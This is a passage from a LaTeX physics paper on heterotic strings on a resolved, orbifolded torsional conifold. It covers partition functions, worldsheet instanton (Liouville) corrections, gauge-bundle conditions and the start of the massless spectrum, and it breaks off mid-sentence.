\begin{equation}
\sum_{m_1 \in \mathbb{Z}_{8\ell^2}} C^{j_1}_{m_1} \oao{a}{b}\, \bar{\chi}^{j_1}\,
\sum_{M \in \mathbb{Z}_{2\ell}} e^{i\pi v (M+\tfrac{u}{2})}C^{j_2}_{m_1-2\ell(2M+u)} \oao{a}{b} \,\bar{\chi}^{j_2} \, \sum_{s \in \mathbb{Z}_2}
\Theta_{2m_1-2\ell(2M+u)+8\ell^2 s,8\ell^2}\,.
\end{equation}
One can in addition simplify this expression using the identity
\begin{equation}
\sum_{s \in \mathbb{Z}_2}
\Theta_{2m_1-2\ell(2M+u)+8\ell^2s,8\ell^2} = \Theta_{m_1-\ell(2M+u),2\ell^2}\, .
\end{equation}
Note that the coset partition function by itself cannot be modular invariant, since fermions from the gauge sector of the heterotic string were used in the coset construction.
\subsection{Heterotic strings on the singular conifold}
\label{sec:hetstr}
The full modular-invariant partition function for the {\it singular} torsional conifold case
can now be established by adding (in the light-cone gauge) the $\mathbb{R}^{2}\times \mathbb{R}_\mathcal{Q}$ contribution, together with the remaining gauge fermions.
Using the coset defined above, one then obtains the following one-loop amplitude:
\begin{multline}
\label{conepf}
Z (\tau ,\bar \tau) = \frac{1}{(4\pi \tau_2 \alpha')^{5/2}} \frac{1}{\eta^3 \bar \eta^3} \,
\frac{1}{2}\sum_{a,b}(-)^{a+b} \frac{\vartheta \oao{a}{b}^2}{\eta^2}
\sum_{m_1 \in \mathbb{Z}_{2k}} \sum_{M \in \mathbb{Z}_{2\ell}}\,
\frac{1}{2}\sum_{u,v \in \mathbb{Z}_2} \frac{\Theta_{m_1-2\ell(M+u/2),2\ell^2}}{\eta} \, \times \\[4pt]
\times \, \sum_{2j_1,2j_2=0}^{k-2}
C^{j_1}_{m_1} \oao{a}{b}
C^{j_2}_{m_1-2\ell(2M+u)} \oao{a}{b} e^{i\pi v (M+\tfrac{u}{2})} \bar{\chi}^{j_1} \bar{\chi}^{j_2}
\,
\frac{\bar{\vartheta} \oao{u}{v}^{15}}{\bar{\eta}^{15}}\,.
\end{multline}
The terms on the second line correspond to the contribution of the $\mathbb{R}^2\times \mathbb{R}_\mathcal{Q} \times U(1)$ piece with the
associated left-moving worldsheet fermions. Their spin structure is given by $\oao{a}{b}$, with $a=0$ (resp. $a=1$) corresponding to the \textsc{ns} (resp. \textsc{r}) sector.
Again, the spin structure of the right-moving heterotic fermions for the
$Spin(32)/\mathbb{Z}_2$ lattice is denoted by $\oao{u}{v}$ (see the last term in this partition function). One may as well consider the $E_8\times E_8$ heterotic string theory, by changing the spin structure accordingly.
We notice that the full right-moving $SU(2)\times SU(2)$ affine symmetry, corresponding to the isometries of the $S^2 \times S^2$ part of the geometry, is preserved, while the surviving left-moving $U(1)$ current represents translations along the $S^1$ fiber. In the partition
function~(\ref{conepf}), the $U(1)$ charges are given by the argument of the theta-function at level $2\ell^2$. Later on, we will realize this $U(1)$ in terms of the canonically normalized free chiral boson $X_\textsc{l} (z)$.
\subsubsection*{Space-time supersymmetry}
The left-moving part of the \textsc{cft} constructed above, omitting the flat space piece, can be described as an orbifold of the superconformal theories:
\begin{equation}
\left[ \mathbb{R}_{1/\ell} \times U(1)_{2\ell^2}\right] \times \frac{SU(2)_k}{U(1)} \times \frac{SU(2)_k}{U(1)} \,.
\end{equation}
The term between the brackets corresponds to a linear dilaton $\rho$ with background charge $\mathcal{Q}=\tfrac{1}{\ell}$, together with a $U(1)$ at level $2\ell^2$ (associated with the bosonic field $X_\textsc{l}$) and a Weyl fermion. This system has $\mathcal{N}=(2,0)$ supersymmetry, as it can be viewed as the holomorphic part of $\mathcal{N}=2$ Liouville theory at zero coupling. The last two factors are $SU(2)/U(1)$ super-cosets which are $\mathcal{N}=2$ minimal models. One then concludes that the left-moving part of the \textsc{cft} has an $\mathcal{N}=2$
superconformal symmetry. The associated R-current reads~:
\begin{equation}
J_R (z) = i \psi^\rho \psi^\textsc{x} +\sqrt{\frac{2}{\alpha'}} \frac{i\partial X_\textsc{l}}{\ell} + i \zeta^1 \zeta^2-\frac{J^3_1}{2\ell^2} +
i \zeta^3 \zeta^4-\frac{J^3_2}{2\ell^2} \, .
\end{equation}
One observes from the partition function~(\ref{conepf}) that the $U(1)$ charge under the holomorphic current
$i\sqrt{2/\alpha'} \partial X_\textsc{l}/\ell$, given by the argument
of the theta-function at level $2\ell^2$, is always such that the total R-charge is an integer of definite parity. Therefore, with the usual
fermionic \textsc{gso} projection, this theory preserves $\mathcal{N}=1$ supersymmetry in four dimensions {\it \`a la} Gepner~\cite{Gepner:1987qi}.
\subsection{Orbifold of the conifold}
\label{orb-sec}
The worldsheet \textsc{cft} discussed in sections \ref{sec:acft} and \ref{sec:hetstr}, as it stands, defines a singular heterotic string background, at least at large $\rho$ where the string coupling constant is small. In addition, it is licit to take an orbifold of the $T^{1,1}$ base in a way that preserves $\mathcal{N}=1$ supersymmetry. If one resolves the singularity with a four-cycle, a $\mathbb{Z}_2$ orbifold is actually needed. From the supergravity point of view, this removes the conical singularity at the bolt, while from the \textsc{cft} perspective, the presence of the orbifold is related to worldsheet non-perturbative effects, as will be discussed below.
Among the possible supersymmetric orbifolds of the conifold, we consider here a half-period shift along the $S^1$ fiber of $T^{1,1}$ base~:
\begin{equation}
\mathcal{T}\, : \ \psi \sim \psi +2 \pi\,,
\end{equation}
which amounts to a shift orbifold in the lattice of the chiral $U(1)$ at level $||\vec{p}^{\,2}||/2$. As the coordinate $\psi$ on the fiber is identified with corresponding coordinates on the Hopf fibers of the two three-spheres, $i.e.$ $\psi/2=\psi_1=\psi_2$, the modular-invariant action of the orbifold can be conveniently derived by orbifoldizing on the left one of the two $SU(2)$ \textsc{wzw} models along the Hopf fiber (which gives the $\mathcal{N}=(1,0)$ worldsheet \textsc{cft} for a Lens space), {\it before} performing the gauging~(\ref{gaugingI}). This orbifold is consistent provided $k$ is even, which is clearly satisfied for the choice $\vec{p}=(2\ell,0^{15})$ we have made so far. Then, the coset \textsc{cft} constructed from this orbifold theory will automatically yield a modular-invariant orbifold of the $T^{1,1}$ \textsc{cft}.
The partition function for the singular orbifoldized conifold is derived as follows. We should first make in the partition function~(\ref{conepf}) the following substitution
\begin{equation}
C^{j_2}_{m_1-2\ell(2M+u)} \oao{a}{b} \
\to \ \frac{1}{2}\sum_{\gamma,\delta \in \mathbb{Z}_2} e^{i\pi \delta(m_1 + 2\ell^2 \gamma)}\,
C^{j_2}_{m_1+4\ell^2 \gamma-2\ell(2M+u)} \oao{a}{b} \,,
\end{equation}
which takes into account the geometrical action of the orbifold. As expected, the
orbifold projection, given by the sum over $\delta$, constrains the momentum along the fiber to be even, both
in the untwisted sector ($\gamma=0$) and
in the twisted sector ($\gamma=1$). Using the reflexion symmetry~(\ref{reflsym}), this expression is equivalent to
\begin{equation}
\frac{1}{2}\sum_{\gamma,\delta \in \mathbb{Z}_2} e^{i\pi \delta(2j_2 + (2\ell^2-1) \gamma)} \,
C^{j_2+ \gamma(k/2-2j_2-1)}_{m_1-2\ell(2M+u)} \oao{a}{b} \,(-)^{\delta a +\gamma b +\gamma \delta}\, .
\label{orbchar}
\end{equation}
The phase factor $(-)^{\delta a +\gamma b +\gamma \delta}$ gives the action of a $(-)^{F_{\textsc{l}}}$
orbifold, $F_{\textsc{l}}$ denoting the left-moving space-time fermion number. Therefore the orbifold by itself is not supersymmetric,
as space-time supercharges are constructed out of $SU(2)/U(1)$ primaries with $j_1=j_2=0$ in the \textsc{r} sector ($a=1$).
In order to obtain a supersymmetric orbifold one then needs to supplement this identification with
a $(-)^{F_{\textsc{l}}}$ action in order to offset this projection. Then, we will instead quotient by $\mathcal{T} (-)^{F_{\textsc{l}}}$, which preserves space-time supersymmetry.
The last point to consider is the possible action of the orbifold on the $Spin (32)/\mathbb{Z}_2$ lattice. In this case, there is a specific constraint to be satisfied that will guide us in the selection of the right involution among all the possible ones. From the form of the orbifold projection in expression~(\ref{orbchar}) one notices that in the twisted sector ($\gamma=1$) the $SU(2)$ spin $j_2$ needs to be half-integer. As we will discuss below, if we consider the worldsheet \textsc{cft} for the resolved conifold,
this leads to an inconsistency due to worldsheet non-perturbative effects. Note that this
problem is only due to the particular choice of shift vectors $\vec{p}$ of the form~(\ref{minimalsol}) satisfying $\vec{p}^{\, 2}\equiv 0 \mod 4$, rather than $\vec{p}^2\equiv 2 \mod 4$ which is more natural in supergravity.\footnote{This choice was made for convenience, as it involves the minimal number of right-moving fermions. One
can check that all coset models with $\vec{p}\equiv 2 \mod 4$ involve a larger number of right-moving worldsheet fermions. In such cases, one cannot obtain a partition function explicitly written in terms of standard fermionic characters (although the \textsc{cft} is of course well-defined).}
However, as one would guess, the situation is not hopeless. In this example, as in other models with $\vec{p}^{\, 2}\equiv 0 \mod 4$, one way to obtain the correct projection in the twisted sector is to supplement the $\mathbb{Z}_2$ geometrical action with a $(-)^{\bar S}$ projection in the $Spin(32)/\mathbb{Z}_2$ lattice, defined such that spinorial representations of $Spin(32)$ are odd.\footnote{It has a similar effect as the $(-)^{F_{\textsc{l}}}$ projection on the left-movers.} This has the effect of adding an extra monodromy
for the gauge bundle, around the orbifold singularity. Overall one mods out the conifold \textsc{cft} by the $\mathbb{Z}_2$ symmetry
\begin{equation}
\mathcal{R} = \mathcal{T} (-)^{F_\textsc{l}+\bar S}\, .
\label{orbdef}
\end{equation}
Combining the space-time orbifold as described in eq.~(\ref{orbchar}) with the $(-)^{\bar S}$ action, one obtains a \textsc{cft} for orbifoldized conifold,
which is such that states in the left \textsc{ns} sector have integer $SU(2)\times SU(2)$ spin in the orbifold twisted sector. The full partition
function of this theory reads:
\begin{multline}
\label{orbconepf}
Z (\tau, \bar \tau) =\frac{1}{(4\pi \tau_2 \alpha')^{5/2}} \frac{1}{\eta^3 \bar \eta^3} \,
\frac{1}{2}\sum_{a,b}(-)^{a+b} \frac{\vartheta \oao{a}{b}^2}{\eta^2}
\sum_{2j_1,2j_2=0}^{k-2} \sum_{m_1 \in \mathbb{Z}_{2k}}C^{j_1}_{m_1} \oao{a}{b}\, \frac{1}{2}\sum_{u,v \in \mathbb{Z}_2}
\frac{\bar{\vartheta} \oao{u}{v}^{15}}{\bar{\eta}^{15}}
\, \times \\[4pt]
\times \,
\frac{1}{2}\sum_{\gamma,\delta \in \mathbb{Z}_2} (-)^{\delta(2j_2 + 2\ell^2 \gamma+u) +v\gamma}
\sum_{M \in \mathbb{Z}_{2\ell}}C^{j_2+ \gamma(k/2-2j_2-1)}_{m_1-2\ell(2M+u)} \oao{a}{b} e^{i\pi v (M+\tfrac{u}{2})}
\frac{\Theta_{m_1-2\ell(M+u/2),2\ell^2}}{\eta}\, \bar{\chi}^{j_1} \bar{\chi}^{j_2} \,.
\end{multline}
To conclude, we insist that if one chooses a gauge bundle with $\vec{p}^{\, 2}\equiv 2 \mod 4$, no orbifold action on the gauge bundle is needed in order
to obtain a consistent worldsheet \textsc{cft} for the resolved orbifoldized conifold.
\subsection{Worldsheet CFT for the Resolved Orbifoldized Conifold}
In this section, we move on to construct the worldsheet \textsc{cft} underlying the resolved orbifoldized conifold with torsion~(\ref{sol-nhl}), which possesses a non-vanishing four-cycle at the tip of the cone. As a reminder, this theory
is defined by both gaugings~(\ref{gaugingI},\ref{gaugingII}), where the second one now also involves an $SL(2,\mathbb{R})$ $\mathcal{N}=(1,0)$ \textsc{wzw} model at level $k/2$ and comprises an action on the $Spin(32)/\mathbb{Z}_2$ lattice parametrized by the vector $\vec{q}$.
Denoting by $K^3$ the left-moving total affine current corresponding to the elliptic Cartan of $\mathfrak{sl}(2,\mathbb{R})$ and by $\bar{k}^3$ the right-moving purely bosonic one, the gauging leads to two constraints on their zero modes~:
\begin{equation}
K^3_0 = \frac{\sqrt{\alpha ' k'}}{2} p_\textsc{x} \, , \qquad\qquad 2\bar{k}^3_0 = -\vec{q} \cdot \vec{Q}_\textsc{f}\,,
\label{sl2constr}
\end{equation}
where $p_\textsc{x}$ is the momentum of the chiral boson $X_\textsc{l}$.
As for the first gauging, these constraints can be solved by decomposing the $SL(2,\mathbb{R})$ characters in terms of the (parafermionic) characters of the coset $SL(2,\mathbb{R})/U(1)$ and of the time-like $U(1)$ which is gauged.
We consider from now on the model obtained for the choice of shift vectors $\vec{p}$ and $\vec{q}$ given by eq.~(\ref{minimalsol}), minimally solving the anomaly cancellation conditions~(\ref{anomalyconstrI},\ref{anomalyconstrII}). This choice implies also that the $SL(2,\mathbb{R})$ part of the gauged \textsc{wzw} model will be the same as for an $\mathcal{N}=(1,1)$ model (as the third entry of $\vec{q}$
corresponds to the worldsheet-supersymmetric coupling of fermions to the gauged \textsc{wzw} model). The supersymmetric
level of $SL(2,\mathbb{R})$ in this example is $k'=2\ell^2$. Conveniently one can then use the characters of the super-coset both
for the left- and right-movers.\footnote{These characters, identical to the ones of $\mathcal{N}=2$ Liouville theory, are described in appendix~\ref{appchar}.}
Then, the third entry of the shift vector $\vec{q}$~(\ref{minimalsol}) corresponds to the minimal coupling of the gauge field to an extra right-moving Weyl fermion of charge $\ell$.
Solving for the constraints~(\ref{sl2constr}), one obtains the partition function for $Spin(32)/\mathbb{Z}_2$ heterotic strings on the resolved orbifoldized conifold with torsion. The first contribution comes
from continuous representations, of $SL(2,\mathbb{R})$ spin $J=\tfrac{1}{2} + iP$, whose wave-function is delta-function normalizable. It reads
\begin{multline}
\label{resolvedcontpf}
Z_c (\tau ,\bar \tau) =\, \frac{1}{(4\pi \tau_2 \alpha')^{2}} \frac{1}{\eta^2 \bar \eta^2}
\frac{1}{2}\sum_{a,b}(-)^{a+b} \frac{\vartheta \oao{a}{b}}{\eta}
\sum_{2j_1,2j_2=0}^{4\ell^2-2} \, \sum_{m_1 \in \mathbb{Z}_{8\ell^2}}\, C^{j_1}_{m_1} \oao{a}{b} \, \\
\times
\frac{1}{2}\!\!\sum_{u,v \in \mathbb{Z}_2}
\frac{1}{2}\!\sum_{\gamma,\delta \in \mathbb{Z}_2} (-)^{\delta(2j_2 + 2\ell^2 \gamma+u) +v\gamma}
\!\!\!\sum_{M,N \in \mathbb{Z}_{2\ell}}\!\! \!(-)^{ v (M+N+u)} C^{j_2+ \gamma(k/2-2j_2-1)}_{m_1-2\ell(2M+u)} \oao{a}{b}
\bar{\chi}^{j_1} \bar{\chi}^{j_2} \frac{\bar{\vartheta} \oao{u}{v}^{13}}{\bar{\eta}^{13}}\\[4pt]
\times \frac{4}{\sqrt{\alpha' k}} \int_0^\infty\! \mathrm{d} P \,
Ch_c \oao{a}{b}\left(\tfrac{1}{2}+iP, \tfrac{m_1}{2}-\ell(M+\tfrac{u}{2});\, \tau\right) \,
Ch_c \oao{u}{v} \left(\tfrac{1}{2}+iP,\ell(N+\tfrac{u}{2});\, \bar{\tau}\right)\,.
\end{multline}
By using the explicit expression for the characters $Ch_c \oao{a}{b} (\tfrac{1}{2}+iP,n)$ of the continuous representations of $SL(2,\mathbb{R})$ (see eq.~(\ref{extcontchar})), one can show that
this contribution to partition function is actually
identical to the partition function~(\ref{orbconepf}) for the orbifoldized singular conifold.
This is not suprising, as the one-loop amplitude (\ref{resolvedcontpf}) captures the modes that are not localized close to the singularity and
hence are not sensitive to its resolution.\footnote{The effect of the resolution can be however observed in the sub-dominant term of the density of continuous representations, that does not scale
with the infinite volume of the target space and is related to the reflexion amplitude by the Liouville potential discussed below, see\cite{Maldacena:2000kv,Israel:2004ir}.}
More interestingly, we have {\it discrete representations} appearing in the spectrum, labelled by their $SL(2,\mathbb{R})$ spin $J>0$. They correspond to states whose wave-function is localized near the resolved singularity, $i.e.$ for $r\sim a$. Their contribution to the partition function is as follows
\begin{multline}
\label{resolveddiscpf}
Z_d (\tau ,\bar \tau) =\, \frac{1}{(4\pi \tau_2 \alpha')^{2}} \frac{1}{\eta^2 \bar \eta^2}
\frac{1}{2}\sum_{a,b}(-)^{a+b} \frac{\vartheta \oao{a}{b}}{\eta}
\sum_{2j_1,2j_2=0}^{4\ell^2-2} \, \sum_{m_1 \in \mathbb{Z}_{8\ell^2}}\, C^{j_1}_{m_1} \oao{a}{b} \, \\ \times
\frac{1}{2}\!\sum_{u,v \in \mathbb{Z}_2}
\frac{1}{2}\!\sum_{\gamma,\delta \in \mathbb{Z}_2} (-)^{\delta(2j_2 + 2\ell^2 \gamma+u) +v\gamma}
\!\!\!\sum_{M,N \in \mathbb{Z}_{2\ell}}\!\! (-)^{ v (M+N+u)} C^{j_2+ \gamma(k/2-2j_2-1)}_{m_1-2\ell(2M+u)} \oao{a}{b}
\bar{\chi}^{j_1} \bar{\chi}^{j_2} \frac{\bar{\vartheta} \oao{u}{v}^{13}}{\bar{\eta}^{13}}\\ \times\sum_{2J=2}^{2\ell^2+2}
Ch_d \oao{a}{b}\left(J, \tfrac{m_1}{2}-\ell(M+\tfrac{u}{2})-J-\tfrac{a}{2};\, \tau\right) \,
Ch_d \oao{u}{v} \left(J, \ell(N+\tfrac{u}{2})-J-\tfrac{u}{2};\, \bar{\tau}\right) \\ \times \
\delta^{[2]}_{m_1-\ell(2M+u)-a , 2J}\ \delta^{[2]}_{\ell(2N+u)-u, 2J}\,,
\end{multline}
where the mod-two Kronecker symbols ensure that relation~(\ref{Rchargecoset}) holds. These discrete states break part of the gauge symmetry which was left unbroken by the first gauging.
As can be checked from the partition function~(\ref{resolveddiscpf}), the resolution of the singularity preserves $\mathcal{N}=1$ space-time supersymmetry. Indeed, the left-moving part of the one-loop amplitude consists in a tensor product of $\mathcal{N}=2$ superconformal theories
(the $SL(2,\mathbb{R})/U(1)$ and two copies of $SU(2)/U(1)$ super-cosets) whose worldsheet R-charges add up to integer values of definite parity.
Getting the explicit partition function for generic shift vectors $\vec{p}$ and $\vec{q}$ is not conceptually more difficult, but technically more involved.
One needs to introduce the string functions associated with the coset \textsc{cft} $[Spin(32)/\mathbb{Z}_2]/[U(1)\times U(1)]$, where the embedding of the two gauged affine $U(1)$ factors are specified by
$\vec{p}$ and $\vec{q}$. In the fermionic representation, this amounts to repeatedly use
product formulas for theta-functions. The actual form of the results will clearly depend on the arithmetical properties of the shift vectors' entries.
\subsection{Worldsheet non-perturbative effects}\label{wnpe}
The existence of a worldsheet \textsc{cft} description for the heterotic resolved conifold background gives us in addition a handle on worldsheet instantons effects. As for the warped Eguchi-Hanson background analyzed in~\cite{Carlevaro:2008qf}, at least part of these effects are captured by worldsheet non-perturbative corrections to the $SL(2,\mathbb{R})/U(1)$ super-coset part of the \textsc{cft}. In the present context, these corrections should correspond to string worldsheets wrapping the $\mathbb{C}P^1$'s of the blown-up four-cycle.
It is actually known~\cite{fzz,Kazakov:2000pm,Hori:2001ax} that the $SL(2,\mathbb{R})/U(1)$ coset receives non-perturbative
corrections in the form of a sine-Liouville potential (or an $\mathcal{N}=2$ Liouville
potential in the supersymmetric case). Thus, to ensure that the worldsheet \textsc{cft} is
non-perturbatively consistent, one needs to check whether the operator corresponding to this
potential, in its appropriate form, is part of the physical spectrum of the theory. Whenever this is not the case, the resolution of the conifold singularity with a four-cycle is not possible.
The marginal deformation corresponding to this Liouville potential can be written in an asymptotic free-field description, valid in the large $\rho$ region far from the bolt. There, $\rho$ can be viewed as
a linear dilaton theory, as for the singular conifold theory.
Let us begin with the specific choice of gauge bundle corresponding to the model~(\ref{resolvedcontpf}).
The appropriate Liouville-type interaction reads in this case (using the bosonic representation of the Cartan generators in~(\ref{cartanbosfer})):\footnote{We set here $\alpha'=2$ for convenience. The bosonic fields $X$,$Y^i$ and $\rho$, as well
as the fermionic superpartners, are all canonically normalized.}
\begin{equation}
\label{Liouvint}
\delta S = \mu_\textsc{l} \int \mathrm{d}^2 z \, (\psi^\rho +i\psi^\textsc{x})(\bar{\xi}^5+i\bar{\xi}^6) e^{-\ell(\rho + iX_\textsc{l}+iY^2_\textsc{r})}
+ c.c.\,.
\end{equation}
Note that the contribution of the $SU(2)/U(1)$ coset is trivial. One now requires the operator appearing in the deformation (\ref{Liouvint}) to be part of the
physical spectrum, at super-ghost number zero. If so, it can be used to de-singularize the
background.
We proceed to determine the quantum numbers of this operator to be able to identify its contribution in the partition function~(\ref{orbconepf}). Let us begin by looking at the holomorphic
part. We denote by $p_\textsc{x} = -\ell$ the momentum of the compact boson $X_\textsc{l}$. Looking at the partition function for the singular conifold~(\ref{orbconepf}), a state with such momentum for $X_\textsc{l}$ obeys the condition
\begin{equation}
m_1-\ell(2M+u) \equiv -2\ell^2 \mod 4\ell^2\,.
\end{equation}
For this operator to be in the right-moving \textsc{ns} sector we require $u=0$. Secondly we want the contributions of both
$SU(2)/U(1)$ super-cosets to be isomorphic to the identity. The solution to these constraints is given by\footnote{Note
that the two $SU(2)/U(1)$ cosets seem naively to play inequivalent roles; this simply comes
from the fact that we are solving the coset constraint~(\ref{zeroconstr}) in a way that is not explicitly invariant under permutation of the
two cosets.}
\begin{equation}
m_1=0 \quad , \qquad M = \ell
\end{equation}
In order to obtain the identity operator, one selects the
representations $j_1=0$ and $j_2=0$ respectively. The reflexion symmetry~(\ref{reflsym}) maps the contribution of the second $SU(2)/U(1)$ super-coset
--~which belongs to the twisted sector of the $\mathbb{Z}_2$ orbifold~(\ref{orbdef})~-- to the identity.
This property also ensures that the Liouville potential in~(\ref{Liouvint}) is even under the left-moving \textsc{gso} projection.\footnote{Indeed, as a $(-)^b$ factor appears in the right-hand side of the identity~(\ref{reflsym}), the left \textsc{gso} projection is reversed.}
On the right-moving side, one first needs to choose the momentum of $Y_\textsc{r}^2$ to be
$\bar{p}_\textsc{y} = -\ell$. This implies that the state under consideration has $N=-\ell$ in the partition function~(\ref{orbconepf}). Secondly, having $j_1=j_2=0$ ensures that the right $SU(2)_k\times SU(2)_k$ contribution is trivial. This would not have be possible without the $\mathbb{Z}_2$ orbifold. This shows that, as in~\cite{Carlevaro:2008qf},
the presence of the orbifold is dictated by the non-perturbative consistency of the worldsheet \textsc{cft}. This illustrates in a remarkable way how the condition in supergravity guaranteeing
the absence of a conical singularity at the bolt manifests itself in a fully stringy description.
A last possible obstruction to the presence of the Liouville potential (\ref{Liouvint}) in the spectrum
comes from the right-moving \textsc{gso} projection, defined in the fermionic representation of the
$Spin (32)/\mathbb{Z}_2$ lattice, given in~(\ref{orbconepf}) by the sum over $v$. Now, the
right worldsheet fermion number of the Liouville potential~(\ref{Liouvint}) is given by
\begin{equation}
\bar{F}= \ell +1 \mod 2\,,
\end{equation}
and, in addition, the right-moving \textsc{gso} projection receives a contribution related to the momentum $p_X$, which can be traced back to the coset producing the $T^{1,1}$ base of the conifold (see the phase $(-)^{vM}$ in the partition function~(\ref{orbconepf}) of our model).
As we are in the twisted sector of the $\mathbb{Z}_2$ orbifold, the
heterotic \textsc{gso} projection is reversed (because of the $(-)^{v\gamma}$ factor). Overall, the right \textsc{gso} parity of the Liouville
operator~(\ref{Liouvint})
is then $2\ell \mod 2$. Therefore the Liouville potential~(\ref{Liouvint}) is part of the physical spectrum for any $\ell$.
In the \textsc{cft} for the resolved conifold, the operator corresponding to the Liouville potential belongs to the discrete representation of $SL(2,\mathbb{R})$ spin
$J=\ell^2$. One can check from the partition function of the discrete states~(\ref{resolveddiscpf}) that it is indeed physical. This operator
is also chiral w.r.t. both the left and right $\mathcal{N}=2$ superconformal algebras of $SL(2,\mathbb{R})/U(1)\times SU(2)/U(1) \times SU(2)/U(1)$.
\subsubsection*{Non-perturbative corrections for generic bundles}
This analysis can be extended to a generic Abelian gauge bundle over the resolved conifold,
{\it i.e.} for an arbitrary shift vector $\vec{q}$ leading to
a consistent gauged \textsc{wzw} model. One can write the necessary Liouville potential in a free-field description as
\begin{equation}
\label{Liouvintgen}
\delta S = \mu_\textsc{l} \int \mathrm{d}^2 z (\psi^\rho +i\psi^\textsc{x})e^{-\frac{\sqrt{\vec{q}^{\,2}-4}}{2} (\rho + i X_\textsc{l})}
\, e^{\frac{i}{2}\vec{q} \cdot \vec{Y}_\textsc{r}}
+ c.c. \,.
\end{equation}
Again we require this operator to be part of the physical spectrum of the heterotic coset \textsc{cft} (\ref{cosetdef}),
taking into account the \textsc{gso} and orbifold projections.
We have to discuss two cases separately:\\
\noindent $\bullet$ {\it Bundles with} $c_1(V) \in H^2 (\mathcal{M}_6,2\mathbb{Z})$\\[4pt]
Let us first start by looking at bundles with $\vec{p}^{\, 2}\equiv 2 \mod 4$, for which the orbifold allows the Liouville operator to
be in the spectrum without any action in the $Spin(32)/\mathbb{Z}_2$ lattice (see the discussion in subsection~\ref{orb-sec}).
On top of the parity under the orbifold projection, on also needs to check that the right \textsc{gso} projection is satisfied.
The right worldsheet fermion number of this operator is given by
\begin{equation}
\bar{F}= \frac{1}{2}\sum_{i=1}^{16} q_i\, .
\end{equation}
As for the particular example above, the right \textsc{gso} projection also receives a contribution from the $X_\textsc{l}$ momentum.
The generalization of the $(-)^{v\ell}$ phase found there to a generic Abelian bundle can be shown to be:
\begin{equation}
e^{ \frac{i \pi }{2} v \sum\limits_{i=1}^{16} p_i}\, .
\end{equation}
Therefore, one concludes that the gauge bundle associated with the resolution of the conifold needs to satisfy the constraint
\begin{equation}
\frac{1}{2}\sum_{i=1}^{16} (q_i - p_i) \equiv 0 \mod 2 \,.
\label{fwcondcft}
\end{equation}
We observe (as for the warped Eguchi-Hanson heterotic \textsc{cft}, see~\cite{Carlevaro:2008qf}) that this condition is similar to one of the two conditions given by eq.~(\ref{Kth2}). Considering only bundles with vector structure, the constraints~(\ref{fwcondcft})
and~(\ref{Kth2}) are just the same. If we choose instead a bundle without vector structure, the entries of $\vec{q}$ are all
odd integers, see~(\ref{constr-pandq}). Therefore the condition of right \textsc{gso} invariance of the complex conjugate Liouville operator actually reproduces
the second constraint of eq.~(\ref{Kth2}).
To make a long story short, this means that, in all cases, requiring the existence of a Liouville operator invariant under the right \textsc{gso} projection in the physical spectrum is equivalent to the condition~(\ref{Kth}) on the first Chern class of the gauge bundle, {\it i.e.} that $c_1 (V) \in H^2(\mathcal{M}_6,2\mathbb{Z})$. This remarkable
relation between topological properties of the gauge bundle and the \textsc{gso} parity of worldsheet instanton corrections may
originate from modular invariance, that relates the existence of spinorial representations of the gauge group to the projection with the right-moving worldsheet fermion number.\\
\noindent $\bullet$
{\it Bundles with} $c_1(V) \in H^2 (\mathcal{M}_6,2\mathbb{Z}+1)$\\[4pt]
We now consider bundles with $\vec{p}^{\, 2}\equiv 0 \mod 4$, for which an orbifold action in the $Spin(32)/\mathbb{Z}_2$ lattice is necessary for the Liouville operator to be part of the physical spectrum. The $(-)^{\bar{S}}$ action in the orbifold has the effect of reversing the \textsc{gso} projection in the twisted sector. Hence we obtain the condition
\begin{equation}
\frac{1}{2}\sum_{i=1}^{16} (q_i - p_i) \equiv 1 \mod 2\,,
\label{fwcond}
\end{equation}
which now entails $c_1 (V) \in H^2(\mathcal{M}_6,2\mathbb{Z}+1)$. This condition on the first Chern class is the opposite (in evenness) to the standard condition on $c_1(V)$ appearing in the previous case~(\ref{fwcondcft}); this fact can be traced back to the extra monodromy
of the gauge bundle around the resolved orbifold singularity.
\subsection{Massless spectrum}
In this section, we study in detail the massless spectrum of the resolved heterotic conifold with torsion. As in~\cite{Carlevaro:2008qf}, the gauge bosons
corresponding to the unbroken gauge symmetry are non-normalizable, hence do not have support near the resolved singularity. In contrast, the spectrum
of normalizable, massless states consists in chiral multiplets of $\mathcal{N}=1$ supersymmetry in four dimensions.
As all the states in the right Ramond sector are massive, we restrict ourselves to the \textsc{ns} sector ($u=0$). In this case the orbifold projection
enforces $j_2 \in \mathbb{Z}$. One first looks for chiral operators w.r.t. the left-moving $\mathcal{N}=2$ superconformal algebra of the
coset~(\ref{cosetdef}) of worldsheet R-charge $Q_R = \pm 1$.\footnote{Note that states with $Q_R=0$ in the conifold \textsc{cft} cannot give
massless states, as the identity operator is not normalizable in the $SL(2,\mathbb{R})/U(1)$ \textsc{cft}.}
Then, one must pair them with a right-moving part of conformal dimension $\bar \Delta = 1$.
In the special case studied here, which also comprises a right $\mathcal{N}=2$ superconformal algebra for the $SL(2,\mathbb{R})/U(1)$ factor, one can start with right chiral primaries
of $SL(2,\mathbb{R})/U(1)$, tensored with conformal primaries of the bosonic $SU(2)_{k-2} \times SU(2)_{k-2}$, which
overall yields a state of dimension $\bar \Delta=1/2$.
A physical state of dimension one can then be constructed either by:
\begin{itemize}
\item adding a fermionic oscillator $\bar{\xi}^a_{-1/2}$ from the free $SO(26)_1$ gauge sector. This gives a state in the fundamental representation of $SO(26)$.
\item taking the right superconformal descendant of the $(1/2,1/2)$ state using the global
right-moving superconformal algebra of the $SL(2,\mathbb{R})/U(1)$ coset ({\it i.e.} acting with $\bar{G}_{-1/2}$). This leads to a singlet of $SO(26)$.
\end{itemize}
In both cases, one needs to check, using the discrete part of the partition function~(\ref{resolveddiscpf}), that such physical states actually exist.
The $U(1)$ symmetry corresponding to translations along the $S^1$ fiber of $T^{1,1}$ (of coordinate $\psi$) corresponds to an R-symmetry in space-time
(of four-dimensional $\mathcal{N}=1$ supersymmetry). In the worldsheet \textsc{cft} for the singular conifold, the associated affine $U(1)$ symmetry is realized in terms of the chiral boson
$X_\textsc{l}$. Therefore the R-charge $R$ in space-time is given by the argument of the theta-function at level $\vec{p}^{\, 2}/2$ (see the partition function~(\ref{orbconepf}).\footnote{In order to correctly
normalize the space-time R-symmetry charges, one needs to ensure that the space-time supercharges have R-charges $\pm 1$. The latter are constructed from vertex operators in the Ramond sector ($a=1$), with $j_1=j_2=0$, $m_1 = \pm 1$ and $M=0$.} In the resolved geometry it is
broken to a $\mathbb{Z}_{\vec{q}^2/2-2}$ discrete subgroup by the Liouville potential~(\ref{Liouvintgen}).
\subsubsection*{Untwisted sector}
Let us begin by discussing the untwisted sector. On the left-moving side, one can first consider states of the
